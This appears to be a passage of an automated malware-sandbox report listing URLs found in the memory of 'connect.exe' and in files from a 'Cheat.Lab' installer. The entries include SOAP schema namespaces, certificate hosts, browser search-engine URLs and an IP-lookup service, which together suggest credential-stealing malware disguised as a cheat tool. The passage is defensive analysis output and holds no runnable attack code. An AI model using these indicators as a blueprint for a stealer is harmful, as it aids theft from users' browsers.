                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://t2.symcb.com0
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1Response
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1ResponseD
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2Response
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2ResponseD
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002926000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3Response
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002926000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3ResponseD
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                    Source: connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 